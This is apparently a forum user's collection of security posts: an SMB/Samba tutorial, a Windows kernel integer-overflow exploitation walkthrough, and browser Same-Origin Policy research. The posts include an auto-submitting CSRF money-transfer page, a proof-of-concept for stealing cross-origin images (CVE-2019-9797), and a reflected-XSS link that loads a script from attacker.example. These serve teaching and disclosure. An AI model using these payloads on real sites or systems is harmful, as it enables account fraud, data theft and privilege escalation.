Everything posted by Nytro

  1. Make Redirection Evil Again: URL Parser Issues in OAuth. Xianbo Wang (1), Wing Cheong Lau (1), Ronghai Yang (1,2), and Shangcheng Shi (1). (1) The Chinese University of Hong Kong, (2) Sangfor Technologies Co., Ltd. Download: https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf
  2. The weather:

     curl http://wttr.in
  3. Can you execute JS?
  4. Yes, mov (as well as other instructions) is Turing-complete.
  5. Network Basics for Hackers: Server Message Block (SMB) and Samba
     March 4, 2019 | OTW

Welcome back, my aspiring cyber warriors! This series is intended to provide the aspiring cyber warrior with all the information you need to function in cyber security from a network perspective, much like my "Linux Basics for Hackers" is for Linux. In this tutorial we will address Server Message Block, or SMB. Although most people have heard the acronym, few really understand this key protocol. It may be the most impenetrable and least understood of the communication protocols, yet it is critical to the smooth functioning of your network and its security.

What is SMB?

Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol that enables users and applications to share resources across their LAN. This means that if one system has a file that is needed by another system, SMB enables the user to share their files with other users. In addition, SMB can be used to share a printer over the Local Area Network (LAN). SMB over TCP/IP uses port 445.

SMB is a client-server, request-response protocol. The diagram below illustrates the request-response nature of this protocol. Clients connect to servers via TCP/IP or NetBIOS. Once the two have established a connection, the clients can send commands to access shares, read and write files and access printers. In general, SMB enables the client to do everything they normally do on their system, but over the network.

SMB was first developed by IBM in the 1980s (IBM was the dominant computer company from the 1950s through the mid 1990s) and was then adopted and adapted by Microsoft for its Windows operating system.

CIFS

The terms CIFS and SMB are often confused by novices and cyber security professionals alike. CIFS stands for "Common Internet File System." CIFS is a dialect, or form, of SMB. That is, CIFS is a particular implementation of the Server Message Block protocol, developed by Microsoft for use on early Microsoft operating systems. CIFS is now generally considered obsolete, as it has been supplanted by more modern implementations of SMB, including SMB 2.0 (introduced in 2006 with Windows Vista) and SMB 3.0 (introduced with Windows 8 and Server 2012).

Vulnerabilities

SMB in Windows, and Samba in Linux/Unix systems (see below), have been a major source of critical vulnerabilities on both of these operating systems in the past and will likely continue to be a source of critical vulnerabilities in the future. Two of the most critical Windows vulnerabilities of the last decade or so have been SMB vulnerabilities: MS08-067 and, more recently, the EternalBlue exploit developed by the NSA. In both cases, these exploits enabled the attacker to send specially crafted packets to SMB and execute remote code with system privileges on the target system. In other words, armed with these exploits, the attacker could take over any system and control everything on it. For a detailed look at the EternalBlue exploit against Windows 7 by Metasploit, see my tutorial here. In addition, using Metasploit, an attacker can set up a fake SMB server to capture credentials.

The Linux/Unix implementation of SMB, Samba, has had its own problems as well. Although far from a complete list of vulnerabilities and exploits, when we search Metasploit 5 for SMB exploits we find the considerable list below.
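The list can be reproduced in the Metasploit console; the exact output varies by version, but a search along these lines brings up the SMB exploit modules, including the two highlighted next:

msf5 > search type:exploit smb
msf5 > info exploit/windows/smb/ms17_010_eternalblue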
Note the highlighted, infamous MS08-067 exploit, responsible for the compromise of millions of Windows Server 2003, Windows XP and earlier systems. Near the bottom of the list you can find the NSA's EternalBlue exploit (MS17-010), which the NSA used to compromise an untold number of systems and which, after its release by the Shadow Brokers, was used by such ransomware as Petya and WannaCry. In the Network Forensics section here at Hackers-Arise, I have detailed packet-level analysis of the EternalBlue exploit against SMB on a Windows 7 system.

Samba

While SMB was originally developed by IBM and then adopted by Microsoft, Samba was developed to mimic a Windows server on a Linux/UNIX system. This enables Linux/UNIX systems to share resources with Windows systems as if they were Windows systems.

Sometimes the best way to understand a protocol or system is simply to install and implement it yourself. Here, we will install, configure and implement Samba on a Linux system. As usual, I will be using Kali, which is built upon Debian, for demonstration purposes, but this should work on any Debian system, including Ubuntu, and usually on any of the vast variety of *NIX systems.

Step #1: Download and Install Samba

The first step, if it is not already installed, is to download and install Samba. It is in most repositories, so simply enter the command:

kali > apt-get install samba

Step #2: Start Samba

Once Samba has been downloaded and installed, we need to start it. Samba is a service in Linux and, like any service, we can start it with the service command:

kali > service smbd start

Note that the service is not called "samba" but rather smbd, the SMB daemon.

Step #3: Configure Samba

Like nearly every service or application in Linux, configuration can be done via a simple text file. For Samba, that text file is /etc/samba/smb.conf. Let's open it with any text editor:

kali > leafpad /etc/samba/smb.conf

We can configure Samba on our system by simply adding the following lines to the end of our configuration file. In our example, we name our share, provide a comment explaining it, provide a path to it, and determine whether it is read-only and browsable:

[HackersArise_share]
comment = Samba on Hackers-Arise
path = /home/OTW/HackersArise_share
read only = no
browsable = yes

Note that the share is in the user's home directory (/home/OTW/HackersArise_share) and that we have the option to make the share read-only.

Step #4: Creating a share

Now that we have configured Samba, we need to create a share. A "share" is simply a directory and its contents that we make available to other users and applications on the network. The first step is to create a directory using mkdir in the home directory of the user. In this case, we will create a directory for user OTW called HackersArise_share:

kali > mkdir /home/OTW/HackersArise_share

Once that directory has been created, we need to give every user access to it by changing its permissions with the chmod command:

kali > chmod 777 /home/OTW/HackersArise_share

Now we need to restart Samba to pick up the changes to our configuration file and our new share:

kali > service smbd restart

With the share created, you can access it from any Windows machine on the network by simply navigating to it in File Explorer, entering the IP address and the name of the share, such as:

\\192.168.1.101\HackersArise_share
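The share can also be sanity-checked from another Linux machine with the standard smbclient tool (assuming the Samba server's address is 192.168.1.101, as above):

kali > smbclient -L //192.168.1.101 -U OTW
kali > smbclient //192.168.1.101/HackersArise_share -U OTW

The first command lists the shares the server offers; the second opens an FTP-like session on the new share.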
Conclusion

SMB is a critical protocol on most computer systems for file, port, printer and named pipe sharing. It is little understood and little appreciated by most cyber security professionals, but it can be a critical vulnerability on these systems, as shown by MS08-067 and the NSA's EternalBlue. The better we understand these protocols, the better we can protect our systems from attack and compromise.

Source: https://www.hackers-arise.com/single-post/2019/03/04/Network-Basics-for-Hackers-Server-Message-Block-SMB
  6. Windows Kernel Exploitation Part 3: Integer Overflow
     By Himanshu Khokhar, April 4, 2019. In Exploit Development, Integer Overflow, Kernel Exploitation, Reverse Engineering

Introduction

Welcome to the third part of the Windows Kernel Exploitation series. In this part, we are going to exploit an integer overflow in the HackSysExtremeVulnerableDriver (HEVD).

What exactly is an integer overflow?

For those who do not know about integer overflows, you might be wondering how an integer can overflow. Well, the integer itself does not overflow; the CPU stores integers in fixed-size memory allocations (we are not talking about the heap or the like here). If you are familiar with C/C++ or similar languages, you might recall data types and how each data type has a specific, fixed size. On most machines and OSes, char is 1 byte and int is 4 bytes long. That means a char can hold values that are 8 bits in size, ranging from 0 to 255, or in the case of signed values, -128 to 127. The same goes for integers: on machines where int is 4 bytes in size, it can hold values from 0 to 2^32 - 1 (in the case of unsigned values).

Now, suppose we are using an unsigned int whose largest value can be 2^32 - 1, or 0xFFFFFFFF. What happens when you add 1 to this? Since all 32 bits are set to one, adding one would make it a 33-bit value, but since the storage can hold only 32 bits, those 32 bits are set to 0. When doing operations, the CPU generally loads the number into a 32-bit register (we are talking about x86 here); adding 1 sets the Carry Flag and the register holds the value 0, as all 32 bits are now 0. Now, if there is a size check, say whether the value is greater than 10, then the check will fail; if the size restriction were not there, the comparison operation would return true. To understand this in more detail, let us have a look at the vulnerability and see how we can exploit an integer overflow in HEVD to gain code execution in the Windows kernel.

Vulnerability

Now that we have that cleared up, let us have a look at the vulnerable code (function TriggerIntegerOverflow, located in IntegerOverflow.c). Initially, the function creates an array of ULONGs which can hold 512 elements (BufferSize is set to 512 in the common.h header file).

(Figure: Vulnerable function in IntegerOverflow.c)

The kernel then checks that the buffer resides in user land, and then it prints some information for us. Pretty helpful. Once that has been done, the kernel checks whether the size of the data (along with the size of the Terminator, which is 4 bytes) is more than that of KernelBuffer. If it is, it exits without copying the user-land buffer into the kernel-land buffer.

(Figure: Size checks)

But if that is not the case, it goes ahead and copies the data into the kernel buffer. Another thing to note here is that IF it encounters the BufferTerminator in the user-land buffer, it stops copying and moves ahead. So we need to put the BufferTerminator at the end of our user-mode buffer.

(Figure: Copying user-mode data to the kernel-mode function stack)

The Overflow

The problem at line 100 of IntegerOverflow.c is that if we supply the size parameter as 0xFFFFFFFC, then when the size of the BufferTerminator (4 bytes) is added, the effective size becomes 0xFFFFFFFC + 4 = 0x00000000, which is less than the size of KernelBuffer. We therefore pass the data-size check and move on to the copying of the buffer into kernel mode.
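Before touching the driver, the arithmetic itself is easy to sanity-check; a minimal sketch in Python, emulating the driver's unsigned 32-bit addition with a mask (the variable names are ours, not HEVD's):

size = 0xFFFFFFFC            # user-supplied buffer size
terminator_size = 4          # size of BufferTerminator
# unsigned 32-bit addition wraps around; the mask emulates that in Python
effective = (size + terminator_size) & 0xFFFFFFFF
print(hex(effective))        # 0x0, which sails past a "greater than KernelBuffer?" check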
Verifying the bug

Now, to verify this, we are going to send our buffer to HEVD, but passing 0xFFFFFFFC as the size of the buffer. For now, we will not place a huge buffer and crash the kernel; rather, we will just send a small buffer and confirm.

(Figure: PoC of triggering the integer overflow)

Since we know the buffer is 512 ULONGs, we will just send this data and see what the kernel does. Note: here, the focus is on the 4th parameter of DeviceIoControl rather than on the actual data. Finally, send this buffer to HEVD and see what happens.

(Figure: Successfully triggered integer overflow)

As you can see in the picture, the UserBuffer size says 0xFFFFFFFC, but we still managed to bypass the size validity check and triggered the integer overflow. Having confirmed that by passing 0xFFFFFFFC we can bypass the size check, all that remains is to put a unique pattern after the UserBuffer, and the terminator after that, to find the saved-return-pointer overwrite. If you do not know how to do that, please read Part 1 of this series, where I have shown how to do this. Let us move ahead and exploit it.

Exploiting the Overflow

All that now remains is to overwrite the saved return address with the TokenStealingPayloadWin7 shellcode provided in HEVD, and you are done. Note: you may need to modify the shellcode a bit to keep it from crashing. This is your homework.

Getting the shell

Let us first verify whether I am a regular user or not.

(Figure: Regular user)

As can be seen, I am just a regular user. After we run our exploit, I become nt authority/system.

(Figure: Successful exploitation of the integer overflow)

That's it for this part, folks; see you in the next one. You can find the whole code in my code repo here.

References: HackSysTeam, FuzzySecurity

Source: https://pwnrip.com/windows-kernel-exploitation-part-3-integer-overflow/
  7. Same-Origin Policy: From birth until today

In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser's Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on the cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera, which allow stealing sensitive images via Cross-Site Request Forgery (CSRF).

Overview

- Motivation: An attack... ...and the defence
- What is CORS, SOP, preflight checks and all this gibberish you're talking about?: CORS headers; Why GET should be "safe"
- SOP behaviour across browsers: Browsers tested; Test setup; Server CORS modes; Cross-origin request methods; Requested targets; Results
- Implications
- Tools used
- References

Motivation

An attack...

Cross-Site Request Forgery (CSRF or XSRF) is arguably one of the most common issues we encounter during web app testing, and one of the trickiest to protect against. The attack goes as follows: a malicious user, Eve, has an account with bank.example with account number 123456. Eve wants to steal money from another customer, Bob, and knows that the HTTP request Bob would send to bank.example to transfer $10000 to Eve is as follows:

POST /transfer.php HTTP/1.1
Host: bank.example
Cookie: PHPSESSID={Bob's secret session cookie}

fromAcc=primary&toAcc=123456&amount=10000

Figure 1: An HTTP request vulnerable to CSRF

So she sets up a page at https://evil-eve.example/how-to-delete-yourself-from-the-internet with the following contents:

<!DOCTYPE html>
<html>
<head>
<script>
document.addEventListener("DOMContentLoaded", function() {
  document.getElementById("gimmeTheMoney").submit();
});
</script>
</head>
<body>
<form id="gimmeTheMoney" method="POST" action="https://bank.example/transfer.php">
  <input type="hidden" name="fromAcc" value="primary">
  <input type="hidden" name="toAcc" value="123456">
  <input type="hidden" name="amount" value="10000">
</form>
</body>
</html>

Figure 2: An HTML page which submits the request in Figure 1

The HTML form on the page corresponds to the POST request shown above. When Bob visits Eve's page, in the hope of erasing past mistakes, the form is automatically submitted, and it includes Bob's PHPSESSID cookie (if he has logged in to the bank's website recently), performing the money transfer.

... and the defence

There are a few ways websites can protect their users from this type of attack. This article is not meant to explain all of them in detail; OWASP's cheatsheet does a good job at that, albeit on a technical level. In short, there are two main techniques websites can use to counter CSRF:

1. Relying on the browser...
   1.1. ...and its Same Origin Policy (SOP); this is the scenario I investigate in this article
   1.2. ...by setting cookies with the SameSite flag
2. Using dynamic pages and generating one-time tokens for each action on the page, every time the page is reloaded.

Option 1.1 only works if the application refuses to accept requests that are sent via HTML forms (i.e. requests with content type application/x-www-form-urlencoded, multipart/form-data or text/plain, and no non-standard HTTP headers). This is because the same origin policy only applies to actions taken by JavaScript (and other browser-scripting languages). It does not apply to old-school HTML forms, so browsers can't do anything to block HTML form submissions from untrusted domains.
Requests containing JSON data or non-standard headers (e.g. X-Requested-With), on the other hand, can only be sent via JavaScript. The browser needs to send a so-called "preflight check", and unless the check determines that the target domain (e.g. bank.example) explicitly allows such requests from the origin domain (e.g. evil-eve.example), the browser doesn't send the actual request. bank.example needs to respond with appropriate HTTP headers for the same origin policy to be effective; see the section CORS headers.

Option 1.2 will prevent attacks like the one described, but it is supported only in modern browsers. Furthermore, it will not prevent unauthenticated CSRF attacks against websites which are on an internal network or rely on IP whitelisting for authorization. The method relies on the legitimate server (bank.example) instructing the browser to only include the session cookie if the request is coming from the same origin, i.e. https://bank.example. The browser respects this during HTML form submissions too. This way, money transfers on bank.example work correctly, but the form hosted on evil-eve.example will not include Bob's session cookie when submitted, and hence the transfer will not occur.
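As an illustration of option 1.2 (the cookie value and choice of attributes here are hypothetical, not quoted from any real site), bank.example would set its session cookie along these lines:

Set-Cookie: PHPSESSID=a3fWa1u8; SameSite=Strict; Secure; HttpOnly

With SameSite=Strict (or Lax), the browser omits the cookie from cross-site submissions such as Eve's form, so the forged request arrives unauthenticated.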
Option 2 can be used to prevent CSRF attacks that rely on any HTTP method and submission type (GET or POST; HTML forms or JavaScript), but it has many pitfalls: care needs to be taken to issue, require and validate the token for every request; the server still needs to implement an appropriate CORS policy to prevent malicious sites from learning the token; and the token needs to be generated in a cryptographically secure random way, be long enough, be short-lived and be tied to the current user's session (i.e. invalidated upon log out).

What is CORS, SOP, preflight checks and all this gibberish you're talking about?

An origin is defined by a schema (or protocol), hostname and port number, e.g. https://bank.example:443. The standard says two origins are considered the same if and only if all of the below conditions are met:

- the protocol for both origins is the same, e.g. https
- the hostname for both origins is the same, e.g. bank.example; the hostname can be only partially qualified (e.g. localhost); it can also be an IP address [1]
- the port number for both origins is the same; the port number does not have to be explicitly given, i.e. https://bank.example:443 and https://bank.example are the same origin, since 443 is the default port number for https

Requests sent from one origin to a different one are called cross-origin requests. Historically, browsers flat out refused to allow JavaScript to make cross-origin requests. This was done for security reasons, namely to prevent CSRF. As web applications became more complicated and interconnected, the need for JavaScript-initiated cross-origin requests became evident. To enable cross-origin requests in a secure manner, the standard for Cross-Origin Resource Sharing (CORS) was introduced. CORS says that when making cross-origin requests, browsers must include the Origin header and must not include cookies unless explicitly requested, for example if the request has set XMLHttpRequest.withCredentials to true.

Additionally, CORS defines the concept of a simple request. A request is simple if all of these are true:

- the method is GET, HEAD or POST
- the request does not include non-standard headers
- it submits content of type application/x-www-form-urlencoded, multipart/form-data or text/plain (those that can be submitted via HTML forms)

If the request is simple, the browser can send the request to the external origin, but if the server's CORS policy does not allow the request, the browser must not allow JavaScript to read the response. If the request is not simple, the browser must do a preflight check (OPTIONS HTTP method) with appropriate CORS headers; if the server's CORS policy does not explicitly allow the request, it must refuse to send the actual request. Servers receiving cross-origin requests must respond with appropriate CORS headers indicating whether the request is allowed; this is done irrespective of whether the request is a preflight check (OPTIONS) or the actual request (e.g. GET).

CORS headers

If no preflight check is done, browsers are only required to send the Origin header. Otherwise, the preflight check should have an empty body, include no cookies, and include the Access-Control-Request-Method header with the method of the request to be made, e.g. GET. Additionally, if non-standard headers are to be included, it must list these, comma-separated, in the Access-Control-Request-Headers header.

Servers should respond to a cross-origin request with the following headers:

- Access-Control-Allow-Origin: either a single allowed origin or a wildcard (*) indicating all origins; servers may change the value depending on the Origin of the request
- Access-Control-Allow-Credentials: indicates whether the browser is allowed to send cookies with the request; if omitted, defaults to false; cannot be true if Access-Control-Allow-Origin is *
- Access-Control-Allow-Headers: comma-separated list of allowed headers

A picture table says a thousand words. Table 1 ("The CORS standard") summarizes the required browser behaviour:

- Simple request, server allows origin {not as requested}: no preflight; no JavaScript access
- Simple request, server allows origin *: no preflight; JavaScript access only if no cookies were needed
- Simple request, server allows origin {as requested}: no preflight; JavaScript access
- Non-simple request, server allows origin {not as requested}: preflight sent; no JavaScript access
- Non-simple request, server allows origin *: preflight sent; JavaScript access only if no cookies were needed
- Non-simple request, server allows origin {as requested}: preflight sent; JavaScript access

Table 1: The CORS standard
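To make the preflight mechanics concrete, here is a hypothetical exchange for a JSON (non-simple) POST from Eve's page; all header values are illustrative, and the allowed origin shown (https://partner.bank.example) is invented for the example:

OPTIONS /transfer.php HTTP/1.1
Host: bank.example
Origin: https://evil-eve.example
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type

HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://partner.bank.example
Access-Control-Allow-Credentials: true

Since the Access-Control-Allow-Origin returned does not match https://evil-eve.example, the browser must refuse to send the actual POST.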
Why GET should be "safe"

The preflight checks by browsers and their SOP make sure that requests which may modify sensitive data, such as DELETE, PUT, PATCH and non-simple POST requests, will never be sent to the server from a third-party domain, unless the server explicitly allows such a request from this particular third-party domain. You may then wonder why browsers don't apply the same rules to GET requests. After all, some servers implement, or at least allow, sensitive data operations using GET requests. Take this hypothetical example: a Like button on a social media site (let's call it FakeBook) which is placed under a page and links to https://fakebook.example/like?page=HTTPSEverywhere. When a user clicks the button in order to like the page, the browser sends a GET request to that URL and includes the user's session cookie, so that the server knows which user has liked the page. This is a classic CSRF which the browser can't do anything about. Bob, who is logged in to his FakeBook account, goes to windywellington.example to check the weather. windywellington.example is actually a malicious site which wants to collect likes on FakeBook and redirects Bob back to https://fakebook.example/like?page=WindyWellington. As far as the browser is concerned, there is nothing wrong with that, as there are many legitimate cases which use redirection to third-party domains. And as far as fakebook.example is concerned, Bob may have clicked that Like button himself. Blocking external Referers or using tokens won't work if Like buttons are to be integrated with other sites.

So what could SOP do about GET requests? Pretty much nothing. Browsers are not supposed to block redirects by default. And there are many other ways windywellington.example can trick the browser into requesting a resource from fakebook.example, not limited to:

- embedding https://fakebook.example/like?page=WindyWellington in an iframe [2]
- loading it as a script, image or any other resource
- using an HTML form with the GET method

In none of these cases can either the browser or fakebook.example detect the malicious intent. This is why the HTTP standard clearly states that GET requests should always be "safe", i.e. never change web application data. And this is also the reason why browsers are not required to submit a preflight check for GET requests. Unfortunately, many websites neglect this and fall victim to CSRF attacks like the hypothetical Like button scenario. (Note: facebook.com is not vulnerable in this way.)

SOP behaviour across browsers

Browsers tested

I tested 17 versions of Opera, 16 versions of Firefox, 40 versions of Chrome, 39 versions of Internet Explorer, and one version of Microsoft Edge: a total of 113 browsers, dating back to 2004. All browsers were tested using their default settings. Full list of browsers tested and sources used:

- Opera: I tested one version per year as far back as it supports . Versions can be downloaded from the official Opera archives; versions pre 11.00 can be found on the third-party site . I do not take responsibility for any loss as a result of installing software from unofficial sources. I ran the versions in question on a virtual machine.
- Firefox: I tested roughly one version per year (except version 1.5 from 2005, due to technical issues running the binary) as far back as version 1.0. All versions of Firefox can be downloaded from the .
- Chrome: I used the ready Windows builds from Chromium's builds archive. I did not test stable releases in particular, as the build archives do not indicate which version a build corresponds to. I instead selected one out of roughly every 2000 builds, from the oldest to the newest. The date shown below is approximate, as it corresponds to the release date of the corresponding stable major version. I wrote a script which can fetch a list of all builds for a platform or download the portable version of a given build.
- Internet Explorer: I tested every major version of Internet Explorer as far back as it supports . IE11 on Windows 10 behaves differently to IE11 on older Windows versions, even with the latest patches applied to them. I tested three versions of IE11 on Windows 10, one on Windows 7, and all 31 versions of IE11 on Windows 8.1. Virtual machines for various platforms, including VMware Fusion, with IE versions 8 to 11 can be downloaded from Microsoft; virtual machines for Microsoft Hyper-V can be downloaded as well. These can be imported into VirtualBox, and from there exported to OVF format for VMware.
- Microsoft Edge: I tested only one recent version of Microsoft Edge. A virtual machine for various platforms, including VMware Fusion, with the above Edge version can be downloaded from Microsoft.
Test setup

I wrote an HTTP server based on Python's http.server, and some supporting HTML/JavaScript. The server implements a dummy login and requires a cookie issued by it for requests to any file under /secret/. The CORS headers to be included in the server's response to each request are taken from URL parameters in that request. Supported parameters:

- creds: should be 0 or 1, requesting Access-Control-Allow-Credentials: false or true
- origin: specifies Access-Control-Allow-Origin; it is taken literally unless it is {ECHO}, in which case it is taken from the Origin header in the request

/demos/sop/getSecret.html will prompt for the target origin (which should be different to the one it's loaded from), then log in to it, and fetch https://<target_host>/secret/<secret file>?origin=...&creds=..., requesting each one of the five CORS combinations described below; and it will do so using each of the eight cross-origin request methods described below.

Server CORS modes

Each request was submitted 5 times; each time, the server was configured to reply with one of the following five Access-Control-Allow-* header combinations:

Origin            Credentials
No                No
*                 No
*                 Yes
{as requested}    No
{as requested}    Yes

Table 2: The combinations of CORS server response headers tested, where "{as requested}" means the server specifically allowed the origin the request came from, "Yes" indicates a true value of the header, and "No" a false one

Cross-origin request methods

Each browser was tested with the following cross-origin request methods:

- GET via XHR: no body; simple: Yes; requires cookies: Yes; response data taken from responseText
- POST via XHR: body of type application/json; simple: No; requires cookies: Yes; response data taken from responseText
- GET via iframe [3]: body N/A; simple: Yes; requires cookies: No; response data taken from contentDocument.body.innerHTML
- GET via object [3]: embedded as text/plain; simple: Yes; requires cookies: No; response data taken from contentDocument.body.innerHTML
- GET via 2D canvas: body N/A; simple: Yes; requires cookies: Yes; response data taken from toDataURL()
- GET via bitmap canvas: body N/A; simple: Yes; requires cookies: Yes; response data taken from toDataURL()

Table 3: The cross-origin request and data exfiltration methods tested. The canvas methods were each tested both with and without CORS (the crossorigin attribute), for eight methods in total.

Requested targets

Where the request method used a canvas, the "secret" file was an image; otherwise, the file was a plain text file. Each test was done twice: once to an origin with a different hostname (the IP address of a different interface on the same machine), and once to an origin with the same hostname/IP address but a different port number. This makes for a total of 8 × 5 × 2 = 80 tests per browser.
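To make the parameter handling concrete, here is a minimal sketch of such a server in plain Python; it is an illustrative stand-in under assumptions, not the author's mixnmatchttp code (the handler name, port and response body are made up):

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class CORSEchoHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # CORS response headers come from the request's own URL parameters
        qs = parse_qs(urlparse(self.path).query)
        origin = qs.get('origin', [''])[0]
        if origin == '{ECHO}':
            # reflect the requesting origin, as the {ECHO} mode described above does
            origin = self.headers.get('Origin', '')
        self.send_response(200)
        if origin:
            self.send_header('Access-Control-Allow-Origin', origin)
        if qs.get('creds', ['0'])[0] == '1':
            self.send_header('Access-Control-Allow-Credentials', 'true')
        self.send_header('Content-Type', 'text/plain')
        self.end_headers()
        self.wfile.write(b'the secret')  # stands in for a file under /secret/

if __name__ == '__main__':
    HTTPServer(('', 8000), CORSEchoHandler).serve_forever()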
Results

Below is a summary of those browsers which send the request and/or allow JavaScript to read the response when they shouldn't. For the full list of every request, see the current result tables for cross-origin requests to different hostnames and to the same hostname/different ports.

When the target origin differs by hostname

When the target origin had a different hostname, most browsers were either compliant or forbade the request, which is the safe fallback if CORS is not supported. A notable exception is the currently latest versions of Chrome, Firefox and Opera, which allow JavaScript to read so-called "tainted" canvases. These are canvases rendered from an image which has not been loaded for cross-origin use, i.e. no crossorigin attribute was given. I discovered the bug (CVE-2018-18511) while doing this research and reported it to Google and Mozilla. In addition, a few very old versions of Chrome do not apply the CORS policy to XMLHttpRequests. (In this and the following table, the highlighted cells indicate behaviour that does not conform to the specification.)

Table 4 (browsers with a dangerous SOP policy for origins differing by hostname) reports:

- Chrome 67.0, 69.0, 71.0, 72.0 and 74.0, Firefox 65.0, Opera 56.0: GET via bitmap canvas (no CORS) is readable by JavaScript under every server CORS mode.
- Chrome 2.0.165.0 and 2.0.173.0: GET and POST via XHR are sent and readable regardless of the server's CORS response, with no preflight for the POST.

When the target origin differs only by port number

In addition to the vulnerable browsers listed in Table 4, when the target origin differed only in port number, all versions of Internet Explorer and Edge, including the latest ones, had an unsafe SOP policy. Interestingly, Edge allows exporting of tainted bitmap canvases only in this case, when the origins are on the same host.

Table 5 (browsers with a dangerous SOP policy for origins differing by port number only) reports:

- Internet Explorer 8, 9, 10 and 11 (up to Windows 8.1), Opera 9.00: GET and POST via XHR succeed and are readable regardless of the server's CORS response.
- Chrome 2.0.165.0 and 2.0.173.0: GET and POST via XHR, as in Table 4.
- Microsoft Edge 42, Internet Explorer 7 through 11: GET via iframe is readable under every server CORS mode.
- Microsoft Edge 42, Internet Explorer 9 through 11: GET via object is readable under every server CORS mode.
- Chrome 67.0 through 74.0, Firefox 65.0, Opera 56.0, Microsoft Edge 42, Internet Explorer 9 through 11, Opera 9.00, 9.20 and 9.60: GET via bitmap canvas (no CORS) is readable.
- Internet Explorer 9 through 11, Opera 9.00, 9.20 and 9.60: GET via 2D canvas (CORS) is readable.

Implications

There are two main issues to discuss here.

Issue 1: Exporting of tainted canvases

Sometime in 2018, a bug was introduced in Chrome, Firefox and Opera which allowed rendering any image to a bitmap canvas and exporting it. This is a serious issue, since the browser sends the cookies it has for a domain when loading images from that domain. For example, if a user, while logged in to their account at bank.example, visits an attacker's page, the page can steal any sensitive images the user has access to. All the attacker needs is the URL of the image. The image can be anything, from a personal photo or a scanned document to the QR code for a two-factor-authentication secret. It is an example of cross-site request forgery where it was up to the browser, and not the server, to prevent it.

Google didn't make fixing the issue a priority, as it was not exploitable due to another bug in Chrome: toDataURL() and toBlob() give a generic transparent image for bitmap canvases. They did eventually fix it, and subsequently the other bug, which was giving a transparent image for a bitmap context. Mozilla fixed the bug within days and pushed an update.
Days after that, I discovered an alternative way (CVE-2019-9797) of getting the image: again by converting it to an ImageBitmap, but then rendering it in a 2D canvas instead of a bitmap canvas:

<html><body>
<script charset="utf-8">
function getData() {
  createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) {
    var can = document.createElement('canvas');
    // mfsa2019-04 fixed this
    // --------------------------
    // var ctx = can.getContext('bitmaprenderer');
    // ctx.transferFromImageBitmap(bmap);
    // --------------------------
    // but not this
    var ctx = can.getContext('2d');
    ctx.drawImage(bmap, 0, 0);
    document.getElementById('result').textContent = can.toDataURL();
    var img = document.getElementById('result_render');
    img.src = can.toDataURL();
    document.body.appendChild(img);
  });
}
</script>
<img style="visibility: hidden" src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/>
<br/><textarea readonly style="width:100%;height:10em" id="result"></textarea>
<br/>Re-rendered image:
<br/><img id="result_render">
</body></html>

Mozilla were again quick to fix it; the fix made it into the stable branch on April 1st. Chrome is not vulnerable to this version of the exploit.

Issue 2: IE and Edge's same-origin policy when it comes to origins on the same host

It is clear that Internet Explorer and Edge do not consider origins on the same host but different ports distinct, at least not as distinct as origins with different hostnames. This is not a new issue, or an accidental neglect by Microsoft. The Mozilla Developer Guide is quite clear on the fact that:

Internet Explorer has two major exceptions to the same-origin policy:
- Trust Zones: If both domains are in the highly trusted zone (e.g. corporate intranet domains), then the same-origin limitations are not applied.
- Port: IE doesn't include port in same-origin checks. Therefore, https://company.com:81/index.html and https://company.com/index.html are considered the same origin and no restrictions are applied.

It also clearly points out that these exceptions are nonstandard and unsupported in any other browser.

The behaviour of modern Internet Explorer and Edge is striking for several reasons. The changes introduced for Windows 10 do improve the security of IE, but have been applied inconsistently and insufficiently:

- They are not available for older Windows versions, even though security updates are still being issued for them.
- They close the loophole in XMLHttpRequest, but still allow cross-origin access via iframe; data from another origin can also be stolen using object.

It clearly violates the standard, which was set long ago, and which all other browsers conform to, and conform to for a good reason. I do not know the reasoning behind their same-origin policy, but the implications are not negligible. We often see multiple HTTP services on the same host. Usually one is a standard public site (on ports 80 and 443); another may be an administrative interface, not accessible publicly. Treating these as a single origin exposes every service on the host to attack should even one of them be compromised.

Consider a hypothetical example: a simple public website, which holds no sensitive data and implements no authentication. It is likely that not a lot of attention would be paid to its secure implementation, as it does not appear to be a valuable target for attackers.
Let's say a page on the site, /vulnerable.html, is vulnerable to a reflected Cross-Site Scripting (XSS) attack. An attacker can trick the developer of the site into visiting the following link:

http://localhost/vulnerable.html?search=<script%20src%3d"%2f%2fattacker.example%2fevil.js"><%2fscript>

The vulnerable page will reflect the search parameter and in this way load a script from http://attacker.example/evil.js. The JavaScript will execute in the context of the page, localhost, as if it had been hosted on the site. Any requests made by it will come from the origin http://localhost. Imagine there is a sensitive administrative panel on the same host, port 8080, which is not accessible from the public network and does not allow cross-origin requests. If the developer who's fallen victim to the reflected XSS is using Internet Explorer or Edge, then evil.js from attacker.example will have full access to the panel. In particular:

- if the developer is not logged in to the admin panel: it may attempt to brute-force accounts on the administrative panel
- if the developer is logged in to the admin panel: it can get any data from it, or take any action at the level of privilege of the developer

I leave it to the reader to reach their own conclusion. Mine would be "do not use IE or Edge".

Tools used

- My (not so) simple (anymore) HTTP server, based on Python's simple HTTP server: https://github.com/aayla-secura/mixnmatchttp/tree/master/demos/ and https://pypi.org/project/mixnmatchttp/
- VMware Fusion, for running all of the browsers: https://www.vmware.com/products/fusion.html
- Official Microsoft virtual machines: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

References

- OWASP's CSRF prevention cheatsheet: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
- The Web Origin Concept: https://tools.ietf.org/html/rfc6454
- The Cross-Origin Resource Sharing (CORS) standard: https://www.w3.org/TR/cors/
- The HTTP standard: https://tools.ietf.org/html/rfc7231#section-4.2.1
